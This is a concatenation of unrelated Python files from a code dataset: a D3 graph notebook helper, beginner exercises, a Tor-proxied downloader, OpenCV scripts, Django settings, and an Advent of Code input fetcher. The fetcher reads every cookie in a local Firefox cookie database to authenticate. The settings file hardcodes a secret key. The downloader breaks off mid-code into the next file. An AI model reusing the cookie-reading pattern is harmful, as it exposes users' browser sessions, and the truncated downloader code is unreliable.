name clashes if used multiple times in a notebook\n uid = str(uuid.uuid4())\n \n # compute size of matrix data set\n dataLength = len(data_set)\n\n # load html template file\n html = Path('d3fdgraph_notebook.html').read_text().replace('%%unique-id%%', uid).replace('%%dataLength%%', str(dataLength-1))\n\n # convert graph nodes, links and list of dates to json, ready for d3\n json_nodes = json.dumps(nodesCalibration(data_set,state_name,image))\n json_links = json.dumps(linksCalibration(data_set))\n json_dates = json.dumps(date_list(data_set))\n \n # convert zoom boolean into json format\n zoomBoolean = json.dumps(zoom)\n \n # convert colour array to json\n colourArray = json.dumps(colour)\n \n # convert coordinates array to json\n coordinates = json.dumps(coordinates)\n \n # Use different adjustable configuration values\n config = {'width': 1000,\n 'height': 600,\n 'noderadius': 10,\n 'linkcharge': -200,\n 'linkdistance': 180,\n 'collisionscale': 4,\n 'linkwidthscale': 4,\n 'ticks': 200,\n 'dataLength':dataLength,\n 'nodes': json_nodes,\n 'links': json_links,\n 'date_list':json_dates,\n 'zoomBoolean': zoomBoolean,\n 'colourArray': colourArray,\n 'coordinates': coordinates}\n\n config.update(kwargs)\n js_code = create_d3_fdgraph(uid, config)\n\n # display html in notebook cell\n IPython.core.display.display_html(IPython.core.display.HTML(html))\n \n # display (run) javascript in notebook cell\n IPython.core.display.display_javascript(IPython.core.display.Javascript(data=js_code))\n pass\n\ndef create_d3_fdgraph(uid, config):\n \"\"\"[summary]\n Parameters\n ----------\n uid : string, required\n [description], identifier of svg element\n config : dict, required\n [description], configuration values for js file\n \n Returns\n -------\n [type]\n [description], replaces keywords of js file\n \n Functions\n --------- \n Replaces keywords of Javascript and CSS files with\n given configuration values.\n \"\"\"\n js_code = Path('d3fdgraph_notebook.js').read_text()\n js_code = js_code.replace('%%unique-id%%', uid)\n for key, value in config.items():\n js_code = js_code.replace(f'%%{key}%%', str(value))\n\n return js_code\n\ndef nodesCalibration(data_set, state_name, image):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n state_name : list, optional\n image : list, optional\n \n Returns\n -------\n [type]\n [description], a dictionary of lists of nodes with attributes\n \n Functions\n ---------\n Computes the nodes of the network graph\n \n \"\"\"\n matrixLength = len(data_set[0][1])\n dataLength = len(data_set)\n \n # if state_name is not given, returns a list of alphabets\n if type(state_name) == type(None):\n state_name = string.ascii_uppercase[:matrixLength]\n \n # if image is not given, returns a list of Nones\n if type(image) == type(None):\n image = [None]*matrixLength\n \n nodes = {}\n for i in range(dataLength):\n nodes[i]=[]\n for j in range(matrixLength):\n nodes[i].append({\"id\":state_name[j],\"image\":image[j]})\n return nodes\n\ndef linksCalibration(data_set):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n \n Returns\n -------\n [type]\n [description], a dictionary of lists of links with attributes\n \n Functions\n ---------\n Computes the links of the network graph\n \n \"\"\"\n dataLength = len(data_set)\n matrixLength = len(data_set[0][1])\n links = {}\n \n for k in range(dataLength):\n links[k]=[]\n for j in range(matrixLength):\n for i in range(matrixLength):\n links[k].append({\"source\": i,\"target\": j,\"id\": str(i)+str(j),\n 
\"weight\": data_set[k][1][j][i]})\n return links\n\ndef date_list(data_set):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n \n Returns\n -------\n [type]\n [description], a list of dates, one per entry in the data set\n \n Functions\n ---------\n Computes the list of dates of the network graph\n \n \"\"\"\n date_list = []\n for data in data_set:\n date_list.append(data[0])\n \n return date_list\n","sub_path":"MVVM/Jupyter Notebook/d3fdgraph_notebook.py","file_name":"d3fdgraph_notebook.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"300820404","text":"# Ex7.4\nn = eval(input('How many elements in your tuple? '))\nitems = [] # plain list; avoids shadowing the built-in list()\nfor i in range(n): # read exactly n values\n value = eval(input(\"Append your tuple: \"))\n items.append(value)\nitems_tuple = tuple(items) # avoids shadowing the built-in tuple()\ntarget = input('Enter the str: ')\nprint(target, ' appears ', items_tuple.count(target), ' time(s)')\n\n# # Ex7.2\n# list = []\n# stop = 1\n# while stop == 1:\n# value = eval(input(\"Append your list: \"))\n# list.append(value)\n# stop = eval(input(\"Do you want to continue? (1:Yes, 0:No) \"))\n\n# x = eval(input('Enter a number x: '))\n# print('Sum of list: ', sum(list))\n\n# count = list.count(x)\n# if count > 0:\n# print(x, ' appears ', count, ' time')\n# else:\n# print('There is no ', x, ' in the list')\n# # solution 1\n# greater = []\n# for i in list:\n# if x < i:\n# greater.append(i)\n# if len(greater) == 0:\n# print(x, ' is greater than all numbers in the list')\n# else:\n# print(x, ' is smaller than: ', greater)\n# solution 2??????\n# list.sort()\n# if x > max(list):\n# print(x, ' is greater than all numbers in the list')\n# else:\n# for i in range(0, len(list)-1):\n# if x < list[i]:\n# print(x, ' is smaller than: ', list[i, ])\n# else: break\n\n# # Ex7.1\n# list_animals = ['ant', 'bear', 'cat', 'dog','elephant', 'fish', 'goat', 'hippo']\n# print('List of animals: ', list_animals)\n# print('Number of animals: ', len(list_animals))\n# find = input(\"I want to find:\")\n# found = find in list_animals\n# if found:\n# print('There is a ', find, ' in the list')\n# else:\n# print('There is no ', find, ' in the list')\n","sub_path":"Bai_7_List_Tuple_Set_Dictionary.py","file_name":"Bai_7_List_Tuple_Set_Dictionary.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"556749950","text":"from CRC import *\nimport struct\n\nCOMM=1\nCONFI=2\n \n \nREQT_WEIGHT=1\nREQT_ACCELE=2\nREQT_M_ACCELE=3\nSET_TIME=4\nCONN_REQT=5\n \nSTART_ACCELE_REC=6\nSTOP_ACCELE_REC=7\nSTART_WEIGHT_REC=8\nTRANS=9\nTRANS_ACCEL=10\n\nFIN_WEIGHT_INIT=11\nclass Message:\n def __init__(self,msg=None, com=None,val=None, buf=None):\n print(\"new\")\n if buf!=None:\n self.mssg_type=struct.unpack('i', buf[0:4])[0]\n self.comm_type=struct.unpack('i', buf[4:8])[0]\n self.value=struct.unpack('f', buf[8:12])[0]\n self.CRC=struct.unpack('I', buf[12:16])[0]\n self.buff=buf[0:16]\n elif msg!=None and com!=None and val!=None:\n self.mssg_type=msg\n self.comm_type=com\n self.value=val\n temp=struct.pack(\"i\", msg)+struct.pack(\"i\", com)+struct.pack(\"f\", val)\n self.CRC=getCRC32(temp) & 0xFFFFFFFF\n temp2=struct.pack(\"I\", self.CRC)\n\n self.buff=temp+temp2\n def isOkay(self):\n temp=getCRC32(self.buff[0:12])\n if temp==self.CRC:\n return True\n else:\n return False\n \nclass Message2:\n def __init__(self, mssg_type=None, comm_type=None, value=None, buff=None):\n if 
buff==None:\n if type(mssg_type)==str and type(comm_type)==str and type(value)==str:\n self.mssg_type=mssg_type\n self.comm_type=comm_type\n self.value=value\n else:\n self.mssg_type=mssg_type\n self.comm_type=comm_type\n self.value=str(value)\n self.buff=self.mssg_type+\" \"+self.comm_type+\" \"+self.value\n else:\n self.buff=buff\n res=self.buff.split(' ')\n self.mssg_type=res[0]\n self.comm_type=res[1]\n self.value=res[2]\n \n \n","sub_path":"Final/RaspberryPi/messageSystem.py","file_name":"messageSystem.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"510788477","text":"\nimport socket\nimport socks\n\nsocks.set_default_proxy(socks.SOCKS5, \"localhost\",9150)\nsocket.socket = socks.socksocket\nimport urllib.request\nimport sys\nimport os\nimport time\nimport threading\nfrom tkinter import *\nimport tkinter.ttk as ttk\nre=None\nnewsize=0\nnotr=6\npauseint=0\ncomplete=False\npauseflag=False\ndef compl():\n k=0\n for i in range(0,7):\n k=k+totc[i]\n return k\n \ndef guiclt(goturi,gotname):\n def myexit():\n pass\n try:\n root=Tk()\n root.title('downloader')\n #root.protocol(\"WM_DELETE_WINDOW\", myexit)\n lab=Label(root,text=\"Wait...\",fg=\"red\")\n per=Label(root,text=\"Please Wait..\",fg=\"blue\")\n \n pause=Button(root,text=\"PAUSE\")\n \n pb_hd = ttk.Progressbar(root, orient='horizontal', mode='determinate')\n \n pb_hd.pack(expand=True)\n \n pb_hd[\"maximum\"] = 100\n \n pb_hd['value']=0\n \n lab.pack()\n per.pack()\n def pauseplay(event):\n global pauseint,pauseflag\n if pauseint==0:\n pauseflag=True\n pauseint=1\n pause['text']='Resume'\n time.sleep(0.5)\n else:\n pauseflag=False\n pause['text']='Pause'\n pauseint=0\n time.sleep(0.9)\n pause.bind('',pauseplay)\n\n pause.pack()\n def printgui(text,k):\n text=text\n k['text']=text\n #print(text)\n def reqfunc(a,b):\n global re\n re=urllib.request.Request(a)\n class downloadfile:\n def __init__(self,uri):\n self.maxi=13\n i=0\n self.error=False\n self.size=0\n self.filename=''\n self.parts={}\n self.chunk=0\n self.uri=uri\n printgui(\"Connecting..\",lab)\n while i\n#-------------------------------------------------------------------------------\nimport os.path\nfrom fsrStuff.umFuncs import parseDirectDat, RecordGenerator, BBBB2money\nclass Global(object):\n pass\n\ndef main():\n with open(i10Name, 'r') as i10File:\n i10Lines = i10File.readlines()\n i10Lines.pop(0)\n with open(outName, 'w+b') as outFile:\n outFile.write(bytearray(b'\\x00'*90)) #Plan to throw one away\n outFile.write(bytearray(b'\\x00'*90)) #Well, two actually.\n for obj in RecordGenerator(office, \"Diagnosis\"):\n outRec = bytearray(b'\\x00'*90)\n outRec[0] = outRec[-1] = b'\\x01'\n outRec[5:11] = obj.ID.ljust(6)\n outRec[12:52] = obj.Description.ljust(40)\n if obj.DotFormat:\n outRec[53] = b'\\01'\n outRec[54:60] = obj.ICD.ljust(6)\n else:\n outRec[53:60] = obj.ICD.ljust(7)\n outFile.write(outRec)\n for line in i10Lines:\n outRec = bytearray(b'\\x00'*90)\n outRec[0] = outRec[-1] = b'\\x01'\n outRec[5:11] = line[:6]\n outRec[12:52] = line[9:49]\n outRec[53:60] = line[54:61]\n outFile.write(outRec)\n\nif __name__ == '__main__':\n offices = parseDirectDat(\"e:\\\\ultramed\\direct.dat\")\n office = offices['01']\n outName = os.path.join(os.path.expanduser(\"~\"),\"Desktop\",\"01dia.dat\")\n i10Name = os.path.join(os.path.expanduser(\"~\"),\"Desktop\",\"KamICD10.txt\")\n 
main()\n","sub_path":"writeDiags.py","file_name":"writeDiags.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"271418297","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0005_editoraction_time'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userarticle',\n name='status_by',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='userarticle',\n name='status_comment',\n field=models.TextField(null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='editoraction',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='userarticle',\n name='status',\n field=models.TextField(blank=True, null=True, choices=[(1, b'bask\\xc4\\xb1ya uygun'), (2, b'web i\\xc3\\xa7in uygun'), (3, b'i\\xc3\\xa7erik bak\\xc4\\xb1m\\xc4\\xb1ndan g\\xc3\\xb6zden ge\\xc3\\xa7irilmeli'), (4, b'format bak\\xc4\\xb1m\\xc4\\xb1ndan g\\xc3\\xb6zden ge\\xc3\\xa7irilmeli'), (5, b'uygun de\\xc4\\x9fil')]),\n ),\n ]\n","sub_path":"solfasol/content/migrations/0006_auto_20140820_1149.py","file_name":"0006_auto_20140820_1149.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"251741246","text":"import cv2\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom pprint import pprint\n\nfrom templates import get_templates\nfrom image_utils import resize_image, load_test_image, thicken_image\n\n\n\n### TEMPLATE MATCHING ###\ndef template_matching(img, template):\n #if img == None:\n # print('\\nLOADING TEST IMAGE')\n # img = load_test_image()\n\n img = resize_image(img, 0.5)\n template = resize_image(template, 0.5)\n\n #win = cv2.namedWindow('PREVIEW')\n #cv2.imshow('PREVIEW',img)\n #cv2.waitKey(0)\n\n img = thicken_image(img)\n\n templatet = thicken_image(template)\n w, h = templatet.shape[::-1]\n\n #cv2.imshow('PREVIEW',img)\n #cv2.waitKey(0)\n\n #res = cv2.matchTemplate(img,templatet, cv2.TM_SQDIFF_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_SQDIFF)\n res = cv2.matchTemplate(img,templatet, cv2.TM_CCOEFF_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCOEFF)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCORR_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCORR)\n\n threshold = 0.7\n loc = np.where( res >= threshold)\n\n ### OUTPUT IMAGE\n color = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n rects = 0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(color, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2)\n rects +=1\n print('%d templates matched'%rects)\n cv2.imshow('PREVIEW',color)\n cv2.waitKey(0)\n\n return color\n\n\n\ndef test():\n path = '/home/felix/scripts/response/data/source_png/20150519-k/20150519-k-002-000.png'\n template_dir = '/home/felix/scripts/response/data/templates'\n\n #tmplt1 = os.path.join(template_dir, 'box_empty_0.png') #TM_CCOEFF_NORMED 0.7\n #tmplt1 = os.path.join(template_dir, 'box_cross_0.png')\n\n #template_dir = '/home/felix/scripts/response/data/templates/boxcrossed'\n #tmplt1 = os.path.join(template_dir, 'cross_2.jpg')\n tmplt1 = os.path.join(template_dir, 'cross_only_0.png')\n\n\n img = 
cv2.imread(path, 0)\n template = cv2.imread(tmplt1, 0)\n\n img = template_matching(img, template)\n\n ### close preview when done\n cv2.destroyAllWindows()\n\n cv2.imwrite('color_image.png', img)\n\nif __name__ == '__main__':\n test()\n","sub_path":"feature_detection_box.py","file_name":"feature_detection_box.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"23218172","text":"import cv2\nfrom threading import Thread\nimport numpy as np\nclass find_point:\n def __init__(self):\n self.img=None\n self.kp=None\n self.des=None\n def start(self):\n # run detection on a worker thread, then join immediately (synchronous overall)\n th=Thread(target=self.find,args=())\n th.start()\n th.join()\n def find(self):\n # detect SURF keypoints and descriptors, then filter them by size\n detector=cv2.xfeatures2d.SURF_create(400,6,6)\n self.kp, self.des=detector.detectAndCompute(self.img, None)\n self.key_size()\n\n def set_img(self,im):\n self.img=cv2.imread(im)\n def set_cv_img(self,im):\n self.img=im\n def get_point(self):\n return self.kp, self.des\n def key_size(self):\n # keep only keypoints larger than 20 px together with their descriptors\n kp_=[]\n des_=[]\n for i in range(len(self.kp)):\n if self.kp[i].size>20:\n kp_.append(self.kp[i])\n des_.append(self.des[i])\n self.kp=kp_\n self.des=np.float32(des_)\n","sub_path":"final/Find_Keypoint.py","file_name":"Find_Keypoint.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"636902258","text":"import argparse\nimport os\nimport requests\nimport sqlite3\nfrom http.cookiejar import Cookie, CookieJar\n\ndef get_cookies(cj, ff_cookies):\n con = sqlite3.connect(ff_cookies)\n cur = con.cursor()\n cur.execute(\"SELECT host, path, isSecure, expiry, name, value FROM moz_cookies\")\n for item in cur.fetchall():\n c = Cookie(0, item[4], item[5],\n None, False,\n item[0], item[0].startswith('.'), item[0].startswith('.'),\n item[1], False,\n item[2],\n item[3], item[3]==\"\",\n None, None, {})\n #print(c)\n cj.set_cookie(c)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('year', help=\"Year of AOC event for which data should be downloaded, e.g. '2021'\")\nparser.add_argument('day', type=int, help=\"Day of AOC event for which data should be downloaded, e.g. 
'5'\")\nargs = parser.parse_args()\n\nfilename = f'data{args.day:02}.txt'\nfullpath = os.path.join(f'sol{args.year}', 'data', filename)\nif os.path.exists(fullpath):\n raise ValueError(f'Data for {args.year}/{args.day:02} already exists.')\n\ncj = CookieJar()\nff_cookies = 'C:/Users/sandr/AppData/Roaming/Mozilla/Firefox/Profiles/b7au43qk.default-release/cookies.sqlite'\nget_cookies(cj, ff_cookies)\ns = requests.Session()\ns.cookies = cj\n\nurl = f\"https://adventofcode.com/{args.year}/day/{args.day}/input\"\n\nresp = requests.get(url, cookies=cj)\nwith open(fullpath, 'wb') as output:\n output.write(resp.content)\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480670056","text":"class Memory(object):\n def __init__(self):\n \n self.actions = []\n self.rewards = []\n self.masks = []\n self.values = []\n self.entropies = []\n self.log_probs = []\n \n def push(self, action,reward,mask,value,log_prob,entropy):\n \n self.actions.append(action)\n self.rewards.append(reward)\n self.masks.append(mask)\n self.values.append(value)\n self.log_probs.append(log_prob)\n self.entropies.append(entropy)\n \n def pop_all(self):\n \n actions = self.actions\n rewards = self.rewards\n masks = self.masks\n values = self.values\n log_probs = self.log_probs\n entropies = self.entropies\n \n self.actions,self.rewards,self.masks, self.values,self.log_probs,self.entropies = [], [], [], [], [], []\n \n \n return actions,rewards,masks, values,log_probs,entropies","sub_path":"Deep learning/Project (A2C_SNAKE)/Code/Buffers/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16331953","text":"from site_panel.models import *\r\nfrom django.shortcuts import render, HttpResponse ,redirect\r\nfrom .models import *\r\nfrom datetime import datetime\r\n\r\ndef Index(request):\r\n\tplace_count = Place.objects.all().count()\r\n\tferdos_deceased_count = License.objects.filter(move_status='FERDOS-REZA').count()\r\n\tout_deceased_count = License.objects.filter(move_status='SEND-OUT').count()\r\n\tusers_count = MyUser.objects.all().count()\r\n\tnews = New.objects.all().order_by('-created')[:3]\r\n\tahadith = Hadith.objects.all()\r\n\tsliders = Slider.objects.filter(status='Active')\r\n\tblack = False\r\n\tif sliders.count() == 0:\r\n\t\tblack = True\r\n\tcontext = {\r\n\t\t'index':True,\r\n\t\t'users_count':users_count,\r\n\t\t'ferdos_deceased_count':ferdos_deceased_count,\r\n\t\t'out_deceased_count':out_deceased_count,\r\n\t\t'black':black,\r\n\t\t'sliders': sliders,\r\n\t\t'ahadith': ahadith,\r\n\t\t'news': news,\r\n\t\t'place_count': place_count,\r\n\t}\r\n\treturn render(request, 'main-site/index.html', context)\r\n\r\ndef About_Us(request):\r\n\tcontext = {\r\n\t\t'about_us':True,\r\n\t}\r\n\treturn render(request, 'main-site/main-site/about.html', context)\r\n\r\n\r\ndef Memorial(request):\r\n\tmarasems = Marasem.objects.all()\r\n\tcontext = {\r\n\t\t'marasems': marasems,\r\n\t\t'black': True\r\n\t}\r\n\treturn render(request, 'main-site/main-site/memorial.html', context)\r\n\r\ndef Search(request):\r\n\tcontext = {\r\n\t\t'search':True,\r\n\r\n\t}\r\n\treturn render(request, 'main-site/main-site/search.html', context)\r\n\r\n\r\ndef All_News(request):\r\n\tnews = New.objects.filter(status='Public')\r\n\tcontext = 
{\r\n\t\t'news':news,\r\n\t\t'all_news':True\r\n\t}\r\n\treturn render(request, 'main-site/main-site/all_news.html', context)\r\n\r\ndef Contact(request):\r\n\r\n\tif request.method == 'POST':\r\n\t\tfirst_name = request.POST['fname']\r\n\t\tlast_name = request.POST['lname']\r\n\t\temail = request.POST['email']\r\n\t\tsubject = request.POST['subject']\r\n\t\tmessage = request.POST['message']\r\n\t\tif email != '' and first_name != '' and last_name != '' and subject != '' and message != '':\r\n\t\t\ttry:\r\n\t\t\t\tsend_message = Message.objects.get(email=email,status='UnRead')\r\n\t\t\t\tcontext = {\r\n\t\t\t\t\t'error':True,\r\n\t\t\t\t\t'message':'لطفا تا خوانده شدن درخواست قبلی خود منتظر بمانید. با تشکر از انتظار شما'\r\n\t\t\t\t}\r\n\t\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\t\t\texcept:\r\n\t\t\t\tsend_message = Message.objects.create(first_name=first_name,last_name=last_name,email=email,subject=subject,content=message)\r\n\t\t\t\tcontext = {\r\n\t\t\t\t\t'success': True,\r\n\t\t\t\t\t'message': 'ارسال درخواست با موفقیت ارسال شد.',\r\n\t\t\t\t}\r\n\t\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\t\telse:\r\n\t\t\tcontext = {\r\n\t\t\t\t'error': True,\r\n\t\t\t\t'message': 'لطفا همه اطلاعات خواسته شده را تکمیل نمایید.',\r\n\t\t\t}\r\n\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\r\n\tcontext = {\r\n\t\t'warning':True,\r\n\t\t'message':'اطلاعات خود را به دقت وارد نمایید.'\r\n\t}\r\n\treturn render(request, 'main-site/main-site/contact.html', context)","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"98810955","text":"from copy import deepcopy\nimport os\n\nPROJECT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))\nPROJECT_ROOT = os.path.abspath(os.path.join(PROJECT_PATH, os.pardir))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = []\n_admin_names = os.getenv('DJANGO_ADMIN_NAMES', \"\")\n_admin_emails = os.getenv('DJANGO_ADMIN_EMAILS', \"\")\nif (len(_admin_names) > 0 and len(_admin_emails) > 0):\n ADMINS = zip(_admin_names.split(\"|\"), _admin_emails.split(\"|\"))\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_ROOT, 'sqlite.db'),\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nTIME_ZONE = 'America/New_York'\n\n# 2-letter country codes for countries whose time zones we should offer\n# as choices for an event's time zone\nTIME_ZONE_COUNTRIES = ['us', 'fr', 'gb']\n\nLANGUAGE_CODE = 'en-us'\nSITE_ID = os.environ.get('DJANGO_SITE_ID', 1)\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'public', 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'public', 'static')\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_ROOT, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = \"a-wv-x8(e&z!3kry8zq2-apy(u8%6m7k2b80%h8wb57zmo&6v0\"\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 
'django.core.context_processors.debug',\n 'django.core.context_processors.media',\n 'django.core.context_processors.request',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'django_project.urls'\n\nWSGI_APPLICATION = 'django_project.wsgi.application'\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, 'templates'),\n)\n\nFIXTURE_DIRS = (\n os.path.join(PROJECT_ROOT, 'fixtures'),\n)\n\nINSTALLED_APPS = (\n # Django apps\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'grappelli',\n 'django.contrib.admin',\n 'django.contrib.humanize',\n 'django.contrib.sitemaps',\n # External apps\n 'compressor',\n 'selectable',\n 'bootstrap3',\n 'ckeditor',\n 'rest_framework',\n 'django_extensions',\n # Custom apps\n 'utils',\n 'cards',\n 'myuser'\n)\n\nAUTH_USER_MODEL = 'auth.User'\n\n# email settings\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_SUBJECT_PREFIX = \"[loc] \"\nDEFAULT_FROM_EMAIL = \"webmaster@loc.com\"\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'basic': {\n 'format': '%(asctime)s %(name)-20s %(levelname)-8s %(message)s',\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'basic',\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'formatter': 'basic',\n 'filename': os.path.join(PROJECT_ROOT, 'loc.log'),\n 'maxBytes': 10 * 1024 * 1024, # 10 MB\n 'backupCount': 10,\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n '': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n },\n }\n}\n\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\nLOGIN_URL = 'login'\nLOGOUT_URL = 'logout'\nLOGIN_REDIRECT_URL = 'home'\n\n# Application settings\nCOMPRESS_PRECOMPILERS = (\n ('text/less', 'lessc {infile} {outfile}'),\n)\n\nSELECTABLE_MAX_LIMIT = 30\n\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\nCKEDITOR_IMAGE_BACKEND = \"pillow\"\nCKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'\nCKEDITOR_RESTRICT_BY_USER = True\nCKEDITOR_CONFIGS = {\n 'base': {\n 'skin': 'moono',\n 'toolbar_Basic': [\n ['Source', '-', 'Bold', 'Italic']\n ],\n 'toolbar_Full': [\n ['Styles', 'Format', 'Bold', 'Italic', 'Undo', 'Redo'],\n ['Image', 'Table', 'NumberedList', 'BulletedList', 'Link', 'HorizontalRule'],\n ],\n 'toolbar': 'Full',\n 'height': 150,\n 'width': 1000,\n 
'filebrowserWindowWidth': 940,\n 'filebrowserWindowHeight': 725,\n }\n}\n\nCKEDITOR_CONFIGS['narrow'] = deepcopy(CKEDITOR_CONFIGS['base'])\nCKEDITOR_CONFIGS['narrow']['width'] = 400\n\nGRAPPELLI_ADMIN_TITLE = \"Level of Concern\"\n\nENCRYPTED_FIELD_KEYS_DIR = os.environ.get('KEYCZAR_DIR')\n","sub_path":"project/django_project/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"159061928","text":"import requests\nimport json\nfrom collections import defaultdict\nimport pymongo\nimport cassiopeia as cass\nfrom DBKEYS import database_client\nfrom RIOTAPIKEY import key\n\nRIOTAPIKEY = key\n\n# Database info\nmongoclient = pymongo.MongoClient(database_client)\ndb = mongoclient.frequentoflegends\nwin_champs_col = db.winning_champs\nloss_champs_col = db.losing_champs\nwin_champs_class_col = db.winning_champs_classifier\nloss_champs_class_col = db.losing_champs_classifier\n\n# Cassioepeia info\nRIOTAPIKEY = key\ncass.set_riot_api_key(RIOTAPIKEY)\ncass.set_default_region(\"NA\")\n\n\n# No. of champions currently in game\nnumber_of_champions = 146 #len(cass.get_champions())\n\n# Transaction table of all champions by matches played. The format of the table is as follows:\n# Champ1 | Champ2 | Champ3| ...\n# Match1 1 0 0\n# Match2 0 1 1\n# Match3 1 1 1\n#\n# The 1 represents a match where the champion was played and won\n\nwinning_champs_transaction_table = []\nlosing_champs_transaction_table = []\n\n# This stores the equivalent ID's of champions put into the transaction table. While there are 140+ champions in the game, some have ID's stretching as far as the 300's. This sytem allows us to instead create our own ID's in place\n\ntransaction_table_ids_lookup = list()\n\n# DATABASE RETRIEVALS\nwinning_champs = []\nfor document in win_champs_col.find(): # Can use .limit(n) to reduce for testing\n winning_champs.append(document)\n\nlosing_champs = []\nfor document in loss_champs_col.find(): # Can use .limit(n) to reduce for testing\n losing_champs.append(document)\n\n# TRANSACTION TABLE\nfor match in winning_champs:\n win_transaction = [0] * number_of_champions\n\n for champ in match.get('winning_champions'):\n if champ not in transaction_table_ids_lookup:\n 